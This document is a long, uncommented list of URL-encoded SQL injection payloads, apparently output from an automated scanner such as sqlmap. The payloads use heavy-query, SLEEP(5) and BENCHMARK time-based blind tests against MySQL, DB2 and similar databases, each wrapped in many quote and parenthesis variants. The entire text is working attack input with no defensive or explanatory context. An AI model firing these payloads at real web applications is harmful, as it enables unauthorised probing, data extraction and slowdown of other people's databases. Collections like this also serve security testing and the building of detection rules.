1%27%29%20WHERE%204515%3D4515%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%29%20WHERE%202894%3D2894%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%20WHERE%208700%3D8700%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%22%20WHERE%209951%3D9951%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%7C%7C%28SELECT%20%27ppuR%27%20FROM%20DUAL%20WHERE%202209%3D2209%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%7C%7C%28SELECT%20%27zVtI%27%20WHERE%207263%3D7263%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%2B%28SELECT%20jtti%20WHERE%201571%3D1571%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%2B%28SELECT%20%27Blti%27%20WHERE%205892%3D5892%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%201304%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%282224%3D2224 1%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%289349%3D9349 1%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%288443%3D8443 1%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%29%20WHERE%207584%3D7584%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%20WHERE%208854%3D8854%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%27%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%22%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%27%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27SzRx%27%3D%27SzRx 1%27%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27qzim%27%3D%27qzim 1%27%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27CXdm%27%3D%27CXdm 1%27%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27cKqm%27%3D%27cKqm 1%27%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27ytXk%27%20LIKE%20%27ytXk 1%27%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27umGO%27%20LIKE%20%27umGO 1%27%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27rNPf%27%20LIKE%20%27rNPf 1%27%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27ynfQ%27%20LIKE%20%27ynfQ 1%22%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22MabV%22%3D%22MabV 1%22%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22biGI%22%3D%22biGI 1%22%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22jHaJ%22%3D%22jHaJ 1%22%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22VEig%22%3D%22VEig 1%22%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22uYDs%22%20LIKE%20%22uYDs 1%22%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22MGgk%22%20LIKE%20%22MGgk 1%22%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22jYRv%22%20LIKE%20%22jYRv 1%22%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22AOtv%22%20LIKE%20%22AOtv 1%25%27%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27pswU%27%3D%27pswU 1%00%27%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27TOtz%27%3D%27TOtz 1%27%29%20WHERE%203925%3D3925%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%22%29%20WHERE%208851%3D8851%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%27%20WHERE%203806%3D3806%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%22%20WHERE%205318%3D5318%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1%27%7C%7C%28SELECT%20%27lpdX%27%20FROM%20DUAL%20WHERE%207274%3D7274%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27PszD%27%20WHERE%208274%3D8274%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 1%27%2B%28SELECT%20zGDo%20WHERE%209533%3D9533%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 1%27%2B%28SELECT%20%27ZKKy%27%20WHERE%208033%3D8033%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%207133%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 1%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%29%20WHERE%202447%3D2447%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%20WHERE%206118%3D6118%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%25%27%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%25%27%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%25%27%29%29%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%25%27%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%00%27%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%00%27%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%29%20WHERE%202854%3D2854%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%29%20WHERE%204391%3D4391%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20WHERE%203470%3D3470%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%22%20WHERE%207272%3D7272%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%7C%7C%28SELECT%20%27jigd%27%20FROM%20DUAL%20WHERE%208504%3D8504%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%7C%7C%28SELECT%20%27jRLa%27%20WHERE%206032%3D6032%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%2B%28SELECT%20AjqP%20WHERE%203985%3D3985%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%2B%28SELECT%20%27uGEP%27%20WHERE%206818%3D6818%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202659%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- -4400%29%20OR%202357%3DSLEEP%285%29 -3226%29%20OR%202357%3DSLEEP%285%29%20AND%20%284019%3D4019 -3572%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%287270%3D7270 -5535%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%283588%3D3588 -4480%20OR%202357%3DSLEEP%285%29 -9522%29%20WHERE%207681%3D7681%20OR%202357%3DSLEEP%285%29%20--%20 -4894%20WHERE%201102%3D1102%20OR%202357%3DSLEEP%285%29%20--%20 -1262%27%29%20OR%202357%3DSLEEP%285%29 -9707%27%20OR%202357%3DSLEEP%285%29 -3459%22%20OR%202357%3DSLEEP%285%29 -2550%27%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%27nBft%27%3D%27nBft -8458%27%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%27VJvY%27%3D%27VJvY -4053%27%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%28%27VxOE%27%3D%27VxOE -6218%27%20OR%202357%3DSLEEP%285%29%20AND%20%27rVgy%27%3D%27rVgy -8600%27%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%27VSmf%27%20LIKE%20%27VSmf -9094%27%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%27IIMI%27%20LIKE%20%27IIMI -8405%27%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%28%27vBQv%27%20LIKE%20%27vBQv -2570%27%20OR%202357%3DSLEEP%285%29%20AND%20%27CSOq%27%20LIKE%20%27CSOq -9280%22%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%22JNFh%22%3D%22JNFh -6640%22%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%22GEaD%22%3D%22GEaD -4612%22%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%28%22xVNo%22%3D%22xVNo -3923%22%20OR%202357%3DSLEEP%285%29%20AND%20%22IumA%22%3D%22IumA -6981%22%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%22NuNi%22%20LIKE%20%22NuNi -3977%22%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%22ahFS%22%20LIKE%20%22ahFS -4202%22%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%28%22NhxL%22%20LIKE%20%22NhxL -5346%22%20OR%202357%3DSLEEP%285%29%20AND%20%22vrBC%22%20LIKE%20%22vrBC -5697%25%27%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%27%25%27%3D%27 -3507%25%27%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 -9010%25%27%29%29%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 -4456%25%27%20OR%202357%3DSLEEP%285%29%20AND%20%27%25%27%3D%27 -9380%00%27%29%20OR%202357%3DSLEEP%285%29%20AND%20%28%27Wlib%27%3D%27Wlib -1697%00%27%20OR%202357%3DSLEEP%285%29%20AND%20%27yhGZ%27%3D%27yhGZ -9219%27%29%20WHERE%201075%3D1075%20OR%202357%3DSLEEP%285%29%20--%20 -3741%22%29%20WHERE%206173%3D6173%20OR%202357%3DSLEEP%285%29%20--%20 -3646%27%20WHERE%203288%3D3288%20OR%202357%3DSLEEP%285%29%20--%20 -3140%22%20WHERE%201667%3D1667%20OR%202357%3DSLEEP%285%29%20--%20 -3131%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29 -1752%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%285064%3D5064 -1297%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%284423%3D4423 -2617%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%287227%3D7227 -9880%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29 -7480%29%20WHERE%205981%3D5981%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -7843%20WHERE%204416%3D4416%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -4978%27%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29 -1429%27%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29 -5100%22%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29 -1941%27%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%27XXOV%27%3D%27XXOV -2646%27%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%27AxbP%27%3D%27AxbP -7118%27%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%28%27FOdK%27%3D%27FOdK -7162%27%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%27pzrv%27%3D%27pzrv -3701%27%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%27efbN%27%20LIKE%20%27efbN -1861%27%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%27wsyM%27%20LIKE%20%27wsyM -5035%27%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%28%27FgTh%27%20LIKE%20%27FgTh -3833%27%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%27ynrF%27%20LIKE%20%27ynrF -3366%22%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%22xLkA%22%3D%22xLkA -5780%22%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%22fvJR%22%3D%22fvJR 